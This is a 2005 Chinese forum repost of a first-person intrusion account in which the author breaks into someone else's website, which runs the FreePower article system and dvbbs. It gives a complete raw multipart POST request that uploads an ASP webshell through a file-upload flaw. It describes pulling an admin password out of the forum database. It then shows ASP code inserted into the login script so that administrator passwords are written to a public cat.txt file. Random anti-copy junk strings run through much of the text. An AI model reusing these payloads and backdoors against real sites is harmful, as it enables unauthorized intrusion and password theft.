我是这样进入一个黑客站点的

[复制链接]

字体大小: 正常放大

韩冰

823 主题	3 听众	4048 积分

我的地盘我做主

该用户从未签到

电梯直达

1^#

发表于 2005-2-4 23:53 |只看该作者 |正序浏览

|招呼Ta 关注Ta

我是这样进入一个黑客站点的

_content>来源：邪恶八进制中国2 d# |4 t% T) S5 n6 l3 b( Z 作者：恶猫[E.S.T] (EvilCat[E.S.T]), x" \7 M3 m& U/ T9 \" I b . o3 y- N* A; ?5 o$ H4 ^9 O' ? 最近放假在家，没什么事，上网的时间多了，今天在平时喜欢去的几个安全站点转了转，站点上新的好的文章都给大家转到E.S.T的论坛上了（嘻嘻）。闲着也是闲着，干脆在这些站点的友情连接的站点看看，说不定又什么新的东西那。$ h. S, d3 o+ I; z$ h2 F) L 好了，就进这个友情连接的站点看看吧。恩，网站的美工做的不错，看了看文章，没有什么太新的东西。刚要离开这个站点，发现这个站点的页面系统很熟悉，像是动力的文章系统，呵呵，看看页面的最底部写着“Powered by：FP3.6 Sp2”晕～～果真被我猜中，是自由动力文章系统。站点上还有一个dvbbs7.0sp2。出于职业毛病，我对这个站点产生了兴趣•••••••呵呵，在自由动力的文章系统里注册一个帐号看看。我进入用户控制面板中的文章管理看了看，我不说大家也应该知道我想干什么了••••••上传，呵呵。看看上传软件的位置写着“对不起，本站不允许上传”，也是作为一个黑客站点上传漏洞怎么可能有呢。我记得我在黑客x档案增刊上发过一篇《突破封锁动力文章上传漏洞再利用》的文章，文章说明了在禁止注册用户的情况下，我们还是可以用post攻击的方式上传asp木马的。在这种情况下也是这种攻击方式是不是有效那？恩，试试就知道了。我先提交这个页面_soft.asp" target=_blank>http://www.xxx.com/upload_soft.asp页面返回“对不起，本网站不允许上传文件!”我们再提交” _soft.asp" target=_blank>http://www.xxx.com/upfile_soft.asp 5 U7 T' [& Q8 i! I页面返回” 请先选择你要上传的文件！”哈哈，这说明可以用NC提交数据报进行post攻击了，post的内容当然是asp木马了，从现在看，成功的几率也只有50％因为对方要是修补了上传漏洞，即使post过去肯定也是说，文件格式不对。我找了个以前自己利用自由动力上传漏洞的数据包改了改，然后用nc提交过去，嘻嘻，上传成功了.关于数据报的修改和上传漏洞的利用办法我想我就不必在和大家说一遍了，大家应该很熟练了。 J1 F: |, M7 c3 [& W4 ~ 下面给出post过去的数据报：; |- h1 r7 l, g6 v5 i $ f7 Y% q) y! |! B3 H- G @( F. I0 ]) o7 i3 r- P 0 @" ^5 Y& c7 }8 G" R+ GCode:5 P; J( I n3 }3 ]" G6 Y( M POST /Upfile<a href="#" target="_blank">_</a>Soft.asp HTTP/1.1( p, R) |$ S. ]8 R Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* ) u' \9 Q1 ~( [ N* fReferer: <a href="http://www.xxx.com/upload<a href=\" target="_blank">http://www.xxx.com/upload<a href=\"#\" target=\"_blank\">_</a>soft.asp</a> v. W3 c9 R* ~8 r: F, ^0 gAccept-Language: zh-cn5 ^* F, k. P9 G, Z7 f; B5 [ Content-Type: multipart/form-data; boundary=---------------------------7d531c25440a0c: z' q8 R+ ]& A8 w: ~$ j Accept-Encoding: gzip, deflate 2 X& o& g. q6 c( x7 q ]User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322) % _& C0 h7 z* E" D& n2 a; vHost: <a href="http://www.xxx.com" target="_blank">www.xxx.com</a>- b. O# C$ f4 X7 G0 b- I Content-Length: 14972 G/ S! B6 b9 \% g- o0 _ M Connection: Keep-Alive + D3 y! q' W& X/ T% j$ \2 k3 g* L; `Cache-Control: no-cache. b( P4 H8 S: R/ O& d0 [ Cookie:ASPSESSIONIDQSCQSADA=ICEEJPHALJLEBHKFIOJDPLOD; 831225=CookieDate=1&<img src="static/image/smiley/default/titter.gif" smilieid="9" border="0" alt="" />assword=635d6ca36de2ff6f&UserLevel=999&UserName=cat;& V8 H/ u7 O; j& { -----------------------------7d531c25440a0c " `% {$ ?# }9 n' B5 EContent-Disposition: form-data; name="FileName"; filename="C:\Documents and Settings\e.cat\桌面\注入\mm.asp .rar"2 a8 g4 B4 w" J0 n) E g- }; d0 S Content-Type: text/plain 8 b: W+ O8 h4 h9 S1 {" L 5 t2 M; Y( q1 I4 {! J# r2 E* e<%dim objFSO%>- r" }+ p' e5 m( q; X! Z <%dim fdata%> & F6 y3 v! j8 B2 [: G8 x# _<%dim objCountFile%> 9 B/ @" [* O- U<%on error resume next%>+ t* _5 `( a& R0 F- A <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>. { F4 Y+ c( T0 Z# z# J. B6 i6 n# G, O <%if Trim(request("syfdpath"))<>"" then%>5 i. L2 G/ p- `' f& K0 `2 x# f <%fdata = request("cyfddata")%>5 a" ~) D, n/ _ <%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%> . W9 y6 J, j0 L7 m' F6 d3 v<%objCountFile.Write fdata%>' \ C+ P' Y) i' V' B# l <%if err =0 then%>; f( J0 {& s, f$ a <%response.write "save Success!"%>* X& b+ T( x1 x3 v( t3 f& z) Z <%else%>6 `7 I2 M" H9 G% G6 y <%response.write "Save UnSuccess!"%> : }9 X! D; a- A' |/ L! S3 B<%end if%>" D: x. A% T( L4 B/ @# u7 y <%err.clear%> 5 m2 u$ V! u/ k( p<%end if%> 6 J7 X7 N; q. u<%objCountFile.Close%> ! _2 G! d2 t4 O# \7 b' w3 Q<%Set objCountFile=Nothing%>; P$ }0 o* V4 U/ O- J+ I <%Set objFSO = Nothing%>0 b0 X* `4 C7 p* {! @) [/ x <%Response.write "<form action='''' method=post>"%> 2 k9 b: C. b" P7 ~+ l<%Response.write "保存文件的绝对路径(包括文件名:如D:\web\x.asp):"%> ' t! L5 Y4 j) i- {% Q$ j5 ?<%Response.Write "<input type=text name=syfdpath width=32 size=50>"%> ( h( a- \5 S0 m1 \' O0 U<%Response.Write " "%> 7 [% C3 p8 A* X<%Response.write "本文件绝对路径"%> v: d5 a6 [3 h( P9 B5 \<%=server.mappath(Request.ServerVariables("SCRIPT<a href="#" target="_blank">_</a>NAME"))%> 6 I s, j# n3 q! b3 J) @; n<%Response.write " "%> 7 w9 ` R5 G. [) a& g* n<%Response.write "输入马的内容:"%> z7 X5 Z- |3 M- @5 f4 D <%Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%> , F Y. z/ l/ E/ c1 M5 U<%Response.write "<input type=submit value=保存>"%>7 \: b" L& n# e) d, M6 m# w1 r <%Response.write "</form>"%>; o2 ?* ?( x) N( B% Z# x( R9 R0 X -----------------------------7d531c25440a0c5 |9 P" i& r' W% i) h' t0 {2 T" ]( \" ^ Content-Disposition: form-data; name="Submit"4 y, M5 x# a, B+ P1 [* l ( P7 \9 C' C+ H7 }上传 ! }0 s, n2 D1 _3 s O1 o, \-----------------------------7d531c25440a0c— % u& }+ C6 |; N2 j2 S6 m1 `; ?" u! Z( T# s0 d+ b [Ctrl+A Select All] 2 }3 [/ e4 @) o: X$ Z/ w* h- u2 m! s7 P & h0 l* ?) S% z2 n* U* Q4 `/ I* B用提交过去的木马再写入个海洋2005进去，看看网站的目录是什么样子的，权限锁得很死，2 F! P: q @8 p 只能在网站目录浏览，cmd命令一个也执行不了，晕••••••不管那么多了，刚才不是还看到一个dvbbs7.0sp2吗，先把数据库下载下来看看。下载下来后用数据库辅助浏览器看看，在论坛的页面上可以看出XXXX是论坛的管理员，在数据库的DV_User，表和DV_Admin表中可以看出论坛的前台和后台的用户名和密码都是不一样的，然后再用数据库浏览器看看DV_Log表中content字段，关键字password，查看一下是否有明文的管理员密码，呵呵，果真密码出来了是xxxxxx008，从前台的DV_User表中看出用名是前台管理员名字是xxxx和后台的管理员名字后面也差了一个008，估计前台的密吗是不是和后台就差那么一个008那，我用md5转换器验证了一下我的猜测，呵呵，又被我猜中了，看来黑客也是需要运气的哈哈。好了dvbbs的前台和后台的密码都知道了，以后aspshell要是丢了用管理员的密码进去一样可以backup a shell的。下面再把自由动力的数据库下来看看，自由动力的数据库的admin表中的管理员密码的md5值和动网的不一样，看来管理员还是有一些安全意识的。我自己猜测了几个，这回没那么好运了，没又猜出来。不过没关系，我还有办法得到他的密码的，分析一下自由动力的源码，可以看出，密码的验证是靠Admin_ChkLogin.asp这个文件，我们接着往下分析。文件的部分代码如下：- X, ^3 o/ A6 }: D/ H1 m' Q( J 9 A2 ]0 R. Q+ {* g2 o8 S , V* _/ I' p' W* ~ S* c# \6 n3 nCode: " }. }; e% e" i0 D6 y# uusername=replace(trim(request("username")),"'","")- ?6 H0 I: p6 F. C2 G/ b password=replace(trim(Request("password")),"'","") , T4 B: F" z! _/ _ p" {# zCheckCode=replace(trim(Request("CheckCode")),"'","")# X# p- S3 `# e4 Q- O if UserName="" then( q7 ?' c) b. | FoundErr=True, g* ]0 Z" A9 b7 m$ `: @& C6 }( r ErrMsg=ErrMsg & " <li>用户名不能为空！</li>"& @) M/ w3 Z2 u, Y7 h end if3 p) Z3 h0 w4 P if Password="" then . s& W8 m/ v9 I FoundErr=True 9 B; `. J3 Y( _- R ErrMsg=ErrMsg & " <li><a href="http://hackbase.com/hacker" target="_blank">密码</a>不能为空！</li>": i* W, N+ h9 G4 ^1 v4 Q- W end if, u8 O$ m- V8 A* w; k1 h$ G" v( R( a if CheckCode="" then i1 e) t2 e2 M8 r$ [ FoundErr=True1 {% n' v" Z2 F# x( e5 Z ErrMsg=ErrMsg & " <li>验证码不能为空！</li>"# \, u- |9 ^- y1 a7 w end if * h% B! @) q8 Wif session("CheckCode")="" then) }$ k* p+ F7 x2 x. a$ W& b) q FoundErr=True0 X# q' ]' h1 K. K' b ErrMsg=ErrMsg & " <li>你登录时间过长，请重新返回登录页面进行登录。</li>"7 f3 O$ W- {& x. x. z& p p, _' y' ^ end if) |. \% ~* Z$ o7 m8 T( s( f) h if CheckCode<>CStr(session("CheckCode")) then # v5 a4 {, U% L3 @/ Q FoundErr=True " J8 K# j2 q1 Y2 _" n: C ErrMsg=ErrMsg & " <li>您输入的确认码和系统产生的不一致，请重新输入。</li>"' x. {; i% f5 _4 ^/ E: [ end if ) [, ?1 r; _- O& pif FoundErr<>True then! Z) B3 U+ t3 d: i password=md5(password) 5 N. Y( w5 L8 E' J q <a href="http://hackbase.com/hacker" target="_blank">sql</a>="select * from admin where password='"&password&"' and username='"&username&"'"( y7 x2 ]! g8 [5 B! r- O set rs=nt2003.execute(<a href="http://hackbase.com/hacker" target="_blank">sql</a>) ( h z0 a9 L+ y2 j- w6 D- ] if rs.bof and rs.eof then! D% j1 N7 W$ b! ^" \" f FoundErr=True 5 P; J7 T3 t* @2 e6 k ErrMsg=ErrMsg & " <li>用户名或<a href="http://hackbase.com/hacker" target="_blank">密码</a>错误！！！</li>" ! |3 ]' s9 `, U0 o' ? else 6 C0 t, R% P0 _7 t* J$ o) ~# W# `; M7 f Y if password<>rs("password") then 7 _ I( i0 [; n. L& ^ FoundErr=True : l* V* d) J; G7 G/ [6 B ErrMsg=ErrMsg & " <li>用户名或<a href="http://hackbase.com/hacker" target="_blank">密码</a>错误！！！</li>"2 Z1 Q9 ^* f2 S" |& H else* E/ \4 R8 ^* w " i P! _. f7 D; B% g7 j3 C$ o& k8 z nt2003.execute("update Admin set LastLoginIP='"&Request.ServerVariables("REMOTE<a href="#" target="_blank">_</a>ADDR")&"',LastLoginTime='"&now&"',LoginTimes=LoginTimes+1 Where username='"&username&"'") . r- ]. L* c5 ]1 Z session.Timeout=Clng(nt2003.site<a href="#" target="_blank">_</a>setting(15)) + e- Q1 ?- R* ~6 S session("AdminName")=username ( K; f4 p" e" ~' `' _0 r rs.close, z) [- s; m: r' @) z" V2 U set rs=nothing ( k3 i; m" ]8 D! |! e+ ~ Response.Redirect "Admin<a href="#" target="_blank">_</a>Index.asp"+ a5 h7 `. |+ N, d+ W8 T end if c4 C+ Y+ l. q& y+ a+ \ end if4 A& v* y$ s9 X# ^- { rs.close ( W) Z9 x* z, l$ y set rs=nothing l; B& ?, A( ]4 L end if6 r$ g5 Q: t$ K. } if FoundErr=True then$ V8 i+ U, U7 M: o( l4 I call WriteErrMsg()3 W" c+ y! S& q6 q* _ end if , O9 P |8 h8 n ! m$ e8 V. N' J8 P4 F- V+ n9 Q) U" s[Ctrl+A Select All] 1 Z) {/ L4 @" d! K. e . E( X7 s" ?% }2 N ( G1 [: I: y8 f 9 H: P& ~3 E% V, a0 v2 Y" t* l9 n. |, n4 e: w3 {: U- i 可以看出一些基本的错误要是没有找到既FoundErr<>True，程序就会将用户输入的密码转换成md5然后交给数据库去查询。好到此为止，我们将这段代码 ( j+ t4 l' C: B: h/ K" d * ]% C% U/ v8 w3 I2 r- a U7 z" h. ?: _# w/ W Code:+ r* _* v. E; K( n7 B+ ]1 e% G Dim fsoObject 2 R8 \2 j3 z. LDim tsObject / Q! O* Z7 m7 h$ a4 Z" _" ?+ \2 W% cSet fsoObject = Server.CreateObject("Scripting.FileSystemObject") # ~4 }2 J8 L' \' x# Y6 V/ z$ y! N# RSet tsObject = fsoObject.CreateTextFile(Server.MapPath("cat.txt"))tsObject.Write CStr(request("password"))7 w. }& m* F; ^. Q Set fsoObject = Nothing" Q# `, {3 v( m) ` Set tsObject = Nothing 6 A7 M P) |$ n; e; }5 x" d3 }. H5 b% [6 o+ d [Ctrl+A Select All] 6 j; S( D0 ^5 ^% j+ ? & T# b7 t: g* a( q/ S% E7 P. Q; W; C: U. W. B5 |( t 插入到 # Q% e1 @2 M1 B8 t. `# r( @% `- |+ X( H+ d 8 _9 n" {6 T. ^: ?5 P Code:- J, L' c5 K, {1 w3 t! d7 g; v* G if password<>rs("password") then* o0 c5 M7 O4 v9 V% f& `/ S2 }2 \ FoundErr=True( ~' V) D8 H# K# \+ i ErrMsg=ErrMsg & " <li>用户名或<a href="http://hackbase.com/hacker" target="_blank">密码</a>错误！！！</li>" 6 p& m' h; p& ~* W# e$ f2 ?else1 v) N* J3 P! K$ F [# A" O% D; X- v [Ctrl+A Select All] & E$ j) p. p) P9 E0 |' `; J - S- J; F) I5 b e1 h n8 l9 Y4 g$ Z# s6 o 的下面，作用管理员一旦登陆，就回将管理员的密码写入到cat.txt。我们浏_blank>http://www.xxx.com/cat.txt管理员的密码就一栏无余了，呵呵。这个思路虽不是我的原创但是把这个方法用在自由动力上还是第一呀。其实，有朋友回说webshell都有了为什么我对用户的密码还是这么感兴趣，嘿嘿，管理员的qq和e-mail乃至他的ftp等等个人隐私的东西要是和其中的一个密码一样••••••••不过大家可不要这么干呀，我只是做个试验••••••所以大家的密码最好不要用一样的。好了入侵暂且告一段落，提升权限是以后的事，我想给大家分析一下为什么自由动力的文章系统我们可以进行post攻击。" j/ Q$ o5 P. A1 {7 I$ ^: x+ Y0 E ; _, [) P. l0 I/ q/ Y9 i" f. G / S; ] o& j1 _% w 这次成功的原因是两方面造成，一是自由动力程序存才post攻击的可能，二是程序存在上传漏洞。从根本上说还是上传漏洞。

_content>